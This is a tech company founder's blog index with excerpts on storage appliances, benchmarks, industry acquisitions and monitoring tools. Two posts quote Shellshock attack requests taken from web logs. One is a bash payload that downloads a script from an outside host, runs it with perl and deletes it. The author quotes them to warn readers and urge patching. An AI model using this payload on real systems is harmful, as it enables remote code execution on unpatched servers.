This is one of Scalable Informatics FastPath Unison systems, well the bottom part. The top are clients we are using to test with.
[ ](/images/flashy.jpg)
Each of the servers at the bottom is a 4U with 54 physical 2.5 inch 6g/12g SAS or SATA SSDs. We have 5 of these units in the picture. And a number of SSDs on the way to fill them up. Think 0.2PB usable of flash.
Posts
Playing "guess which wire I just pulled" isn't fun
Even less fun when the boxes are half a world away. Yeah, this was my weekend and a large chunk of today. This will segue into another post on design and (unintended) changes in design, and end user expectations at some point. It’s hard to maintain a concept of an SLO if some of the underlying technology you are relying upon to deliver these objectives (like, I dunno, a wire?), suddenly disappears on you.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Tools for linux devops: lsbond.pl
Slowly and surely, I am scratching the itches I’ve had for a while with regards to data extraction from a running system. One of the big issues I deal with all the time is extracting the state and components (and their states) of a Linux network bond. It’s an annoying combination of /sys/class/net, /proc/net/bonding/, and ethtool/ip commands. So I decided to simplify it.
bond0: mac 00:11:22:33:44:55 state up mode load balancing (xor) xmit_hash layer2+3 (2) polling 100 ms up_delay 200 ms down_delay 200 ms ipv4 10.
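For the /proc/net/bonding/ piece of that, a rough Python sketch of the parsing looks something like the following. This is not lsbond.pl (which is Perl and also pulls from /sys/class/net and ethtool/ip); the function name is hypothetical, and the sample text is illustrative, shaped to match the values shown in the output above.

```python
# Hypothetical sketch: parse /proc/net/bonding/<bond>-style text into a dict
# for the bond itself plus one dict per slave interface.

SAMPLE = """\
Ethernet Channel Bonding Driver: v3.7.1 (April 27, 2011)

Bonding Mode: load balancing (xor)
Transmit Hash Policy: layer2+3 (2)
MII Status: up
MII Polling Interval (ms): 100
Up Delay (ms): 200
Down Delay (ms): 200

Slave Interface: eth0
MII Status: up
Permanent HW addr: 00:11:22:33:44:55

Slave Interface: eth1
MII Status: up
Permanent HW addr: 00:11:22:33:44:56
"""

def parse_bonding(text):
    """Return (bond_settings, list_of_slave_dicts)."""
    bond, slaves = {}, []
    current = bond                       # keys land here until the first slave
    for line in text.splitlines():
        # Split on the first colon only, so MAC addresses stay intact.
        key, sep, value = line.partition(":")
        if not sep:
            continue                     # blank line
        key, value = key.strip(), value.strip()
        if key == "Slave Interface":
            current = {"name": value}    # start a new slave section
            slaves.append(current)
        else:
            current[key] = value
    return bond, slaves

bond, slaves = parse_bonding(SAMPLE)
print(bond["Bonding Mode"], "|", bond["Transmit Hash Policy"])
for s in slaves:
    print(s["name"], s["MII Status"], s["Permanent HW addr"])
```

On a real system the text would come from reading `/proc/net/bonding/bond0` (or whatever the bond is called).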
Posts
Day job growing
We brought on a new business development and sales manager today. Actually based in Michigan. Looking forward to great things from him, and we are all pretty excited!
Posts
Baidu attack deflection
So Baidu’s web crawler is broken. Makes the bad old days of bing bot look positively benign. Wasn’t pushing much load, but lots of log spam and it showed signs of increasing over time. So, out comes the ban hammer. Then I thought, why not report their broken bot to them. Should be as simple as an email, or a web page. Sure enough, they have links for filling out forms to indicate that their web crawler is going crazy.
Posts
M&A or more correctly, acqui-hire: Cray bags much of Terascala
Terascala appears to have been disassembled, with much of the team going to Cray. Terascala started out selling internally developed storage appliances for Lustre. They developed deployment, monitoring, and management tools. Their UI was reasonably good. Then they struck up a deal with Dell and a few others. In doing so, they largely stopped their appliance sales. Put their code upon their partners’ hardware. This did generate more force multipliers for them in sales, but it cost them some of their differentiation … unless their boxes were entirely undifferentiated, where it would reduce their overall costs to avoid selling undifferentiated hardware.
Posts
Potential M&A: Micron being pursued
I was heads down all day yesterday working on a few things. Apparently this is widely known now, but I saw it late last night. Micron is being pursued by a group affiliated with Tsinghua University. There is a political angle to this group, as they are connected to the government through their management. Why is this interesting (the acquisition potential that is). Well, there are 4 basic Flash fabs out there these days.
Posts
Fixing Baidu's broken search bot
It seems that the bot was generating some effectively random broken URLs. Or maybe not so random. I saw endpoints in the logs that haven’t been in use for at least 7 years. I can’t imagine this was simply a harmless bug, as much as … maybe? … a search for moved/renamed endpoints? As the web server is now done very differently than in the past, the missing endpoints merely generated log spam.
Posts
Blog post title of the day ... Any Sufficiently Advanced Technology ...
I am a huge fan of Charles Stross’s (@cstross) Laundry series (and most of what he writes in general), and just finished his latest over the weekend. Up on his blog, he had a guest author write a post while he was stuck in traffic or similar. The title of the entry wins the internets today.
Yup, definitely a winner …
Posts
Most of our traffic on the day job site now comes from Baidu
Well, their web crawler. Way way back in the day, I complained about broken bing-bots. This was 8 years ago. Bing was fairly crappy at crawling, and seems to have improved. Google is still the lightest touch. Least impactful. Deeply in the traffic noise. Not Baidu. Their bot is, for lack of a better term, broken. It’s not into DoS levels, but it is wasting traffic/resources, and providing lots of log spam.
Posts
Imitation and repetition is a sincere form of flattery
A few years ago, we demonstrated some truly awesome capability in single racks and on single machines. We had one of our units (now at a customer site), specifically the unit that set all those STAC M3 records, showing this:
and a rack of our units (now providing high performance cloud service at a customer site)
for 8k random reads across 0.25 PB of storage on a very fast 40GbE backbone.
Posts
Portable PetaByte systems update
As a reminder, the day job has 1PB dense and fast (20GB/s and above) storage systems available for about $0.25/GB fully supported, delivered, and installed. All you need to provide is power and a network connection. I should note that we’ve delivered all flash versions of these as well as hybrid versions for various use cases. We will have an update on these leveraging our greater density options, including 2.3PB/rack fully supported for 3 years, with shipping and installation for under $600k USD, as well as a 1PB flash version in 1-2 racks.
Posts
takes a licking and keeps on ticking
One of our systems at a customer site.
    $ uptime
     15:47:33 up 407 days,  3:23,  2 users,  load average: 0.19, 0.10, 0.06
    $ uname -r
    3.10.36.scalable
Posts
A new thing to occupy my time
Doesn’t have to be a code golf mechanism, but this looks like fun!
Posts
Thoughts on a Thursday
We’ve been doing the startup thing for a hair under 13 years now. Most of the time we’ve been self funded, and recently we took a small investment in a friends and family round (angel.co link here). What occurs to me, after we soft announced our 100GbE results via a Mellanox PR today, is that we’ve been building the types of high performance platforms that enable end users to do bigger and better things for the whole time.
Posts
Interesting conversation with a customer about our siRouter
They are turning their SDN concept into one of the most incredible technologies around, a tremendous competitive advantage for them over others in their space. I had been under the impression that they were running everything on their (quite awesome) 10/40GbE switches. These are SDN capable switches from a very well funded SDN switch startup. Turns out, their SDN stack is actually running on siRouter. They are doing some very cool bits on the software stack side, and getting about 2 microseconds port to port.
Posts
Our 100GbE flash storage appliance benchmarks discussed
See the PR bit here (http://www.hpcwire.com/off-the-wire/new-mellanox-performance-benchmarks-released/ for the link impaired). This is a Unison Ceph appliance ( http://scalableinformatics.com/unison ) and they are available and shipping now. Please reach out to us if you’d like to discuss. And yes, this is the world’s first 100GbE storage appliance, or storage server SAN device if you prefer. Easily one of the fastest systems in market. [Update] Forgot to mention, this is a set of units bought by a customer, and at their site.
Posts
Day job is hiring
Business development/sales role for now. See here (url: https://scalableinformatics.com/bus-dev in case you don’t see the link) for more details. Prefer New York, Chicago, Boston, or nearby. No relocation.
Posts
SIOS v2.0 running pxe booted
Our SIOS (Linux based OS, usually based upon Debian) has just been updated for jessie (Debian 8). This was necessary to support rkt, docker, etc. in addition to our other bits. It’s been cooking in the background for a while, for, as you might have noticed from my posting frequency, I’ve been busy. But we are up, and running. Base distro version here:
root@usn-ramboot:~# df -h Filesystem Size Used Avail Use% Mounted on tmpfs 8.
Posts
Off to Chicago for The Trading Show
Looking forward to our booth #243 at the Trading Show in Chicago. We’ll have a FastPath Cadence time series analytics unit with us. Should be fun!
Posts
M&A: Avago grabbed Broadcom, Intel grabs Altera
Avago continues its acquisition spree. Broadcom (network chipsets and NPUs, CPUs, etc.). This is looking like a more integrated semiconductor IP play here. They grabbed LSI, and shed the non-chippery bits. They grabbed PLX. And Emulex. As they say, curiouser and curiouser. This makes perfect sense to me, and given the other acquisition announced today, I am going to bet they will be talking (at least) to Xilinx. And then there’s Intel.
Posts
Massive, Unapologetic Firepower: part 3, the network
Take the world’s fastest hyperconverged storage-compute server. Mix into this the world’s fastest networking. What do you get? (hint: something you can order today)
    ~# iperf -c 192.168.1.1 -l128k -w 512k -P10 -t 4
    ------------------------------------------------------------
    Client connecting to 192.168.1.1, TCP port 5001
    TCP window size: 1.00 MByte (WARNING: requested 512 KByte)
    ------------------------------------------------------------
    [ 11] local 192.168.1.2 port 50804 connected with 192.168.1.1 port 5001
    [  4] local 192.168.1.2 port 50796 connected with 192.
Posts
Been heads down working very hard on something very cool
More soon. We’ll post here, with some basic results. Insanely cool stuff.
Posts
Booth at BioIT World 15 in Boston
Should be fun, we will have booth (#461) on the side near the thoroughfare for the talks. Our HPC on Wall Street booth looked like this:
[ ](/images/HPConWS-booth-spring2015.jpg)
The display on the monitor is from our FastPath Cadence machine, and is part of the performance dashboard, built upon InfluxDB, Grafana, sios-metrics, and influxdbcli. Here is a blown up view, note the vertical axes for BW (GB/s) and IOPs.
[ ](/images/cadence-dash-spring2015.jpg)
Posts
Nebula shuts down
Nebula, a cloud “appliance” (and company) has shut down. The software is open source, so their customers can pay others to provide support, or migrate to another stack. This isn’t a public cloud company, rather a private cloud company. There is little operational risk in moving from one openstack build to another. Feel free to reach out to me (landman @ scalability.org) privately if you need to speak to someone about this.
Posts
M&A: Convey snapped up by Micron
Rich at InsideHPC has the story. There is a good fit for Micron, as they are rapidly turning into one of the stronger players in the space. As I had noted, the storage OEMs are either buying into vertical integration or partnering to make it happen. Convey is actually a natural fit given other of Micron’s projects. The big question is, for the OEMs not going this route, or waiting to go this route, will that strategy work?
Posts
Announcement of new storage appliance
More information in our video (linked here in case the video doesn’t embed properly, you may need to enable flash and scripting on the page to see it embed*). Also, check out the page at the day job:
we don’t do google or other analytics (just local stuff here), so this shouldn’t be a security issue. Let us know if you believe otherwise.
Posts
M&A: Blekko grabbed by IBM for Watson
Have a look at the page. Blekko was started by a number of people including Greg Lindahl, who spent many years in the HPC world. He’s another recovering physical scientist (astronomer as I remember). This is interesting as it gives a sense as to where IBM sees its future. They aren’t (it looks like to me) trying to compete with google, rather, trying to add interesting capability to Watson. They see Watson and things derived from it as their future.
Posts
The world’s fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in as minimal a footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, or integrate them into a larger FastPath Unison system. We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
Π day has come
I like Π … apple, cherry, etc. For those who don’t get the pun, dates in the US are often written as Month/Day/Year, with the year abbreviated to 2 digits. So with this formatting, today is 3/14/15, or roughly the first 5 digits of Π, which is defined to be the ratio of the circumference to the diameter of a circle on a 2D plane. You can extend the pun, by noting at 9:26.
Posts
A completely unsolved problem
contact management across multiple devices/OSes/applications. Yeah, I know, just use iCloud/Gmail/etc. Except they are all broken. And not a little bit. I rely upon one, consistent, correct contact list that has email, phone, etc. for all the people I know and communicate with. In years past, I’ve had this list sync back and forth to Gmail via google. And it used to work. Then iPhone5 and well, ya know, it broke.
Posts
Scalable Informatics customer Milford Film and Animation does awesome projects
It’s nice to hear success stories from our customers. In this case, our friends and customers at Milford Film and Animation have been using our systems for a number of years to provide the basis for their storage efforts. Their systems are very computationally, network, and IO intensive. There is a tremendous amount of rendering, editing, and many other things that require absolutely the highest performance you can get in a dense package.
Posts
My vote for most awesome Mac OSX software
Karabiner. If you switch back and forth between Linux and Mac on the same keyboard, this is an absolute must have. From my perspective, the keys in Mac are horribly borked. Home and End do not do what I expect. Control-Anything doesn’t work except in exceptional cases. iTerm2 (also very good Mac software) largely does the right thing on its own, but the keyboard side of MacOSX is basically borked. This lets you unbork it.
Posts
Memory channel flash: is it over?
[full disclosure: day job has a relationship with Diablo] Russell just pointed this out to me. The short (pedestrian) version (I’ve got no information that is not public, so I can’t disclose something I don’t know anyway): Netlist filed a patent infringement suit against Diablo, and then included SanDisk as they bought Smart Storage, who worked with Diablo prior to Smart being acquired by SanDisk. Netlist appears to have won an (at least temporary) injunction against Diablo.
Posts
New all-flash-array: SanDisk's Infiniflash
Interesting development from SanDisk. Not quite an M&A bit, but an attempt at accelerating adoption of non-spinning storage by bringing out a proof of concept product in a few flavors. They are aiming at $2/GB for this system. This is an array product though, so you need to attach it to a set of servers. Also, for something this large, the specs are kind of disappointing. 7GB/s maximum and 1M IOPs.
Posts
M&A: HGST acquires Amplidata
This is closer to home. Amplidata is an erasure coded cold storage system atop “cheap” hardware. HGST makes, of course, storage devices. This continues a trend in vertical integration of folks with systems experience, and folks who make the things that go into these systems. If you control more of the stack, you can create more value to your bottom line … up to a point. The flip side to this is if you start competing with your customers.
Posts
M&A Avago (the LSI acquirers) just bought Emulex
Ok, this is starting to look like someone is buying up the tech behind storage and storage networking on the hardware side. Avago acquired LSI in 2013, and now they’ve gone and grabbed Emulex. Emulex has a large FC capability, but I can’t imagine that this is the only reason for this buy. They also have converged network adapters, RDMA and offload capability, and other bits. They are an OEM to many large vendors.
Posts
Real measurement is hard
I had hinted at this last week, so I figure I better finish working on this and get it posted already. The previous bit with language choice wakeup was about the cost of Foreign Function Interfaces, and how well they were implemented. For many years I had honestly not looked as closely at Python as I should have. I’ve done some work in it, but Perl has been my go-to language.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Hype at the speed of hype, or big data marketing and media
There was a great post on the marketing of big data by John Foreman on his blog. I found it a very enjoyable read for one … and it showed that hype is a self-similar phenomenon. No matter what topic it is in, some people will try to generate and exploit the generated hype, regardless of the true information content associated with it. I could shake my head, but I’ve seen this, many times over my career.
Posts
Shakes head, chuckles ... yeah, we couldn't see that one coming ...
Just to get this out of the way, apart from this ideologically and politically charged debasement of real science, I am and remain firmly a “believer”* that the Earth’s climate has changed, has been changing, will change, and will continue to change with or without our input. Moreover, our climate has gone through some remarkable changes over its existence, all lovingly preserved in one way or another in the fossil record, and through mechanisms that effectively store state of a system.
Posts
Coraid may be going down
According to The Register. No real differentiation (AoE isn’t that good, and the Seagate/Hitachi network drives are going to completely obviate the need for such things). We once used and sold Coraid to a customer. The linux client side wasn’t stable. iSCSI was coming up and was actually quite a bit better. We moved over to it. This was during our build vs buy phase. We weren’t sure if we could build a better box.
Posts
The Interview (no, not that one!)
Rich at InsideHPC.com (you do read it daily, don’t you?) just posted our (long) interview from SC14. Have a look at it here (http://insidehpc.com/2015/01/video-scalable-informatics-steps-io-sc14/) . As a reminder, Portable PetaBytes are for sale! And yes, the response has been quite good … More soon … And no, we aren’t going to hack anyone
Posts
Micro, Meso, and Macro shifts
The day job lives at a crossroads of sorts. We design, build, sell, and support some of the fastest hyperconverged (aka tightly coupled) storage and computing systems in market. We’ve been talking about this model for more than a decade, and interestingly, the market for this has really taken off over the last 12 months. The idea is very simple. Keep computing, networking, and storage very tightly tied together, and enable applications to leverage the local (and distributed) resources at the best possible speed.
Posts
Inventory reduction @scalableinfo
It’s that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
* 16-24 processor cores
* 128 GB RAM
* 48x {2,3,4} TB top mount drives
* 4x rear mount SSDs (OS/metadata cache)
* Scalable OS (Debian Wheezy based Linux OS)
* 3 year warranty
As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
The #PortablePetaByte : Coming to a data center near you!
As seen at SC14. We have our Portable PetaByte systems available for sale. Half rack to many racks, 1 PB and upwards, 20GB/s and up. Faster with SSDs. See the link above!
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Here’s why.
Swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure in a pathway which assumes no failure.
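The reliability argument can be put into a back-of-the-envelope calculation. This is only a sketch: it assumes independent failures and treats the paging path as a series system (any one component failing breaks the whole path). The function name and the probabilities are made up for illustration; they are not measurements.

```python
def series_failure_probability(component_failure_probs):
    """Probability that at least one component in a series path fails,
    assuming the failures are independent."""
    survive = 1.0
    for p in component_failure_probs:
        survive *= (1.0 - p)
    return 1.0 - survive


if __name__ == "__main__":
    # Hypothetical failure probabilities over some fixed time window.
    p_ram = 0.001   # illustrative only
    p_disk = 0.02   # illustrative only

    ram_only = series_failure_probability([p_ram])
    ram_plus_swap = series_failure_probability([p_ram, p_disk])

    print(f"RAM only:        {ram_only:.5f}")
    print(f"RAM + swap disk: {ram_plus_swap:.5f}")
```

Under these assumptions the combined path can never be more reliable than its least reliable member, which is the point of the paragraph above.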
Posts
#sc14 T-minus 2 days and counting #HPCmatters
On the plane down to NOLA. Going to do booth setup, and then network/machine/demo setup. We’ll have a demo visualfx reel from a customer who uses Scalable Informatics JackRabbit, DeltaV, and (as the result of an upgrade yesterday) Unison. Looking forward to getting everything going, and it will be good to see everyone at the show!
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
Mixing programming languages for fun and profit
I’ve been looking for a simple HTML5-ish way to represent our disk drives in our Unison units. I’ve been looking for some simple drawing libraries in javascript to make this higher level, so I don’t have to handle all the low level HTML5 bits. I played with Raphael and a few others (including paper.js). I wound up implementing something in Raphael.
The code that generated this was a little unwieldy … as javascript doesn’t quite have all the constructs one might expect from a modern language.
Posts
turnkey, low cost and high density 1PB usable at 20+ GB/s sustained
Fully turnkey, we’d ship a rack with everything pre-installed/configured. Some de-palletizing required, but it’s plug and play (power, disks) after that. More details, and a sign up to get a formal quote here. This would be in 24U of rack space for less than $0.18/raw GB or $0.26/usable GB. Single file system name space, a single mount point. Leverages BeeGFS, and we have VMs to provide CIFS/SMB access, as well as NFS access, in addition to BeeGFS native client.
Posts
Velocity matters
For the last decade plus, the day job has been preaching that performance is an advantage, a feature you need, a technological barrier for those with both inefficient infrastructures and built in resistance to address these issues. You find the latter usually at organizations with purchasing groups that dominate the users and the business owners. The advent of big data, (ok, this is what the second or third time around now) with data sets that have been pushing performance capabilities of infrastructure has been putting the exclamation point on this for the past few years.
Posts
A good read on a bootstrapped company
Zoho makes a number of things, including a CRM, that we use. And they are bootstrapped. Like us. There are significant market differences between us and them, but many of the things noted in the article are common truths.
If you don’t start with building a real company, you won’t have a real company. The decisions you make when your own ass is on the line are very different from the ones you might make if it’s someone else’s ass, and money for that matter.
Posts
There are times
… when during a support call, we see the magnitude of the self-inflicted damage, and ask ourselves exactly why did they do this to themselves? Today was like this. We do what we can to protect people from the dangerous rapidly moving sharp objects underneath the hood (or boot). We abstract things, tell them not to put fingers near the spinny blades. Yes, it’s a metaphor. Today was a day of Pyrrhic victories.
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
... and the shell shock attempts continue ...
From 174.143.168.121 (174-143-168-121.static.cloud-ips.com)
Request: '() { :;}; /bin/bash -c "wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache"'
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and it’s very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if it’s RAIDed in hardware/software. It’s a pathway that can fail. And when it fails, all hell breaks loose.
Posts
That may be the fastest I've seen an exploit go from "theoretical" to "used"
Found in our web logs this afternoon. This is bash shellshock.
Request: '() {:;}; /bin/ping -c 1 104.131.0.69'
This bad boy came from the University of Oklahoma, IP address 157.142.200.11 . The ping address 104.131.0.69 is something called shodan.io. Patch this one folks. Remote execution badness, and all that goes along with it.
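If you want to go looking for these in your own logs, something like the following sketch will do. It only assumes the probe looks like the two requests quoted in these posts (a `() { :;};` prefix followed by a command); the function name and regular expression are mine, and real probes may be obfuscated in ways this will not catch.

```python
import re

# Matches the function-definition prefix used by the probes quoted above,
# tolerating optional whitespace: "() { :;};" as well as "() {:;};"
SHELLSHOCK_PREFIX = re.compile(r"\(\)\s*\{\s*:\s*;\s*\}\s*;")


def find_shellshock_payload(log_line):
    """Return the command text that follows the probe prefix, or None."""
    match = SHELLSHOCK_PREFIX.search(log_line)
    if match is None:
        return None
    # Drop surrounding whitespace and the closing single quote of the log entry.
    return log_line[match.end():].strip().rstrip("'").strip()


if __name__ == "__main__":
    samples = [
        "Request: '() {:;}; /bin/ping -c 1 104.131.0.69'",
        "Request: 'GET /index.html HTTP/1.1'",
    ]
    for line in samples:
        print(find_shellshock_payload(line))
```

Finding a match only tells you someone tried; whether it worked depends on whether bash was patched.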
Posts
Interesting bits around EMC
In the last few days, issues around EMC have become publicly known. EMC is the world’s largest and most profitable storage company, and has a federated group of businesses that are complementary to it. The CEO, Joe Tucci, is stepping down next year, and there is a succession “process” going on. Couple this to a fundamental shift in storage, from arrays to distributed tightly coupled server storage, such as Unison, which is problematic for their core business.
Posts
sios-metrics code now on github
See link for more details. It allows us to gather many metrics, and saves them nicely in the database. This enables very rapid and simple data collection, even for complex data needs.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000
Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. It’s way too freaking simple.
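For anyone who has not been bitten by this yet, here is a minimal sketch of the fix, assuming a line-oriented plaintext protocol such as Graphite's (`path value timestamp`, terminated by a newline). The function names are mine, not the ones in the actual monitoring code.

```python
import socket
import time


def format_metric(path, value, timestamp=None):
    """Build one plaintext record. The trailing newline is the record
    terminator; without it a line-oriented receiver just keeps waiting."""
    if timestamp is None:
        timestamp = time.time()
    return f"{path} {value} {int(timestamp)}\n"


def send_metric(host, port, path, value, timestamp=None):
    """Send a single record over TCP (host and port are placeholders)."""
    line = format_metric(path, value, timestamp)
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(line.encode("ascii"))


if __name__ == "__main__":
    # repr() makes the trailing newline visible.
    print(repr(format_metric("lightning.cpuload.avg1", 0.42, 1400000000)))
```

Pointing `send_metric` at the `nc` listener above is a quick way to see exactly what goes over the wire.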
Posts
New monitoring tool, and a very subtle bug
I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.
Posts
New 8TB and 10TB drives from HGST, fit nicely into Unison
The TL;DR version: Imagine 60x 8TB drives (480TB, about 1/2 PB) in a 4U unit, or 4.8PB in a rack. Now make those 10TB drives. 600TB in 4U. 6PB in a full rack. These are shingled drives, great for “cold” storage, object storage, etc. One of the many functions that Unison is used for. These aren’t really for standard POSIX file systems, as your read-modify-write length is of the order of a GB or so, on a per drive basis.
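The capacity arithmetic is easy to check. In this sketch the ten-units-per-rack figure is an assumption, inferred from 480TB per unit becoming 4.8PB per rack (so 40U of 4U units); capacities are raw, decimal TB.

```python
DRIVES_PER_UNIT = 60
UNITS_PER_RACK = 10  # assumption: ten 4U units (40U) per rack


def raw_capacity_tb(drive_tb, units=1, drives_per_unit=DRIVES_PER_UNIT):
    """Raw (unformatted, pre-redundancy) capacity in decimal TB."""
    return drives_per_unit * drive_tb * units


if __name__ == "__main__":
    for drive_tb in (8, 10):
        per_unit = raw_capacity_tb(drive_tb)
        per_rack = raw_capacity_tb(drive_tb, units=UNITS_PER_RACK)
        print(f"{drive_tb}TB drives: {per_unit} TB per 4U, {per_rack / 1000} PB per rack")
```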
Posts
The Haswells are (officially) out
Great article summarizing information about them here. Of course, everyone and their brother put out press releases indicating that they would be supporting them. Rather than add to that cacophony (ok, just a little: All Scalable Informatics platforms are available with Haswell architecture, more details including benchies … soon …) we figured we’d let it die down, as the meaningful information will come from real user cases. Haswell is interesting for a number of reasons, not the least of which is 16 DPi/cycle, but fundamentally, it’s a more efficient/faster chip in many regards.
Posts
Be sure to vote for your favorites in the HPCWire readers choice awards
Scalable Informatics is nominated in
* #12 for Best HPC storage product or technology,
* #20 Top supercomputing achievement, which could be for this, this on a single storage box, or this result,
* #21 Top 5 new products or technologies to watch, for our Unison, and
* #22 for Top 5 vendors to watch.
Our friends at Lucera are nominated for #4, Best use of HPC in financial services. Please do vote for us and our friends at Lucera!
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. Doesn’t quite show the formatting of the output quite right. Will try to fix over the weekend, as I move this to a far more feature complete bit.
Posts
Time series databases for metrics part 2
So I’ve been working with influxdb for a while now, and have a working/credible cli for it. I’ll have to put it up on github soon. I am using it mostly as a graphite replacement, as it’s a compiled app versus a python code, and python isn’t terribly fast for this sort of work. We want to save lots of data, and do so with 1 second resolution. Imagine I want to save a 64 bit measurement, and I am gathering say 100 per second.
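To get a feel for the volume, here is a rough sketch of the raw payload implied by those numbers. It counts only the 8 byte values themselves; timestamps, series names, indexes, and any compression are ignored, so treat it as a floor rather than what a database would actually store.

```python
BYTES_PER_MEASUREMENT = 8      # one 64 bit value
MEASUREMENTS_PER_SECOND = 100  # the "say 100 per second" from the text
SECONDS_PER_DAY = 24 * 60 * 60


def raw_bytes(seconds,
              rate=MEASUREMENTS_PER_SECOND,
              size=BYTES_PER_MEASUREMENT):
    """Raw payload bytes accumulated over the given number of seconds."""
    return seconds * rate * size


if __name__ == "__main__":
    per_day = raw_bytes(SECONDS_PER_DAY)
    per_year = raw_bytes(365 * SECONDS_PER_DAY)
    print(f"per second: {raw_bytes(1)} bytes")
    print(f"per day:    {per_day / 1e6:.2f} MB")
    print(f"per year:   {per_year / 1e9:.2f} GB")
```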
Posts
Have a nice cli for InfluxDB
I tried the nodejs version and … well … it was horrible. Basic things didn’t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here’s an example
./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics
metrics> \list series
.----------------------------------.
| series name                      |
+----------------------------------+
| lightning.cpuload.avg1           |
| lightning.cputotals.idle         |
| lightning.cputotals.irq          |
| lightning.
Posts
Scalable Informatics 12 year anniversary
I had forgotten to mention, but we hit our 12 year mark on the 1st of August. We’ve grown from a small “garage” based company (really “basement-based” in Michigan, as garages aren’t heated in winter, nor cooled in summer here), with one guy doing consulting, cluster system builds, tuning, benchmarking, white paper writing … to a 10 person outfit building the world’s fastest and densest tightly coupled storage and computing systems.
Posts
Time series databases and system metrics
I am working on updating our FastPath appliance web management/monitoring gui for the day job. Trying to push data into databases for later analysis. Many tools have been written on the collection side, statsd, fluentd, … and some are actually pretty cool. The concern for me is the way these tools express their analytical and storage opinions, which is done on the storage side. The data collection side isn’t an issue; if anything, it’s a breath of fresh air relative to what else I’ve seen.
Posts
The best thing one can do with the tuned system is
yum remove tuned tuned-utils
This isn’t quite as bad as THP, but it’s close.
Posts
Soon ... 12g goodness in new chassis
This is one of our engineering prototypes that we had to clear space for. A couple of new features I’ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.
Posts
But ... GaAs is the material of the future ... and always will be ...
I read a note on IBM’s recent allocation of capital towards research projects. It had this tidbit in there:
Well, there is a range of III-V materials. Not just GaAs. One of the big issues is the lattice mismatch between Si and many of the III-V materials. This strain introduces “artifacts” in the bandstructure, not to mention structural morphologies. This said, those artifacts may be what the engineers want. Aluminum Phosphide and Gallium Phosphide are pretty well matched to Si.
Posts
Too simple to be wrong
I’ve been exercising my mad-programming skillz for a while on a variety of things. I got it in my head to port the benchmarks posted on julialang.org to perl a while ago, so I’ve been working on this in the background for a few weeks. I also plan, at some point, to rewrite them in q/kdb+, as I’ve been really wanting to spend more time with it. The benchmarks aren’t hard to rewrite.
Posts
OS and distro as a detail of a VM/container
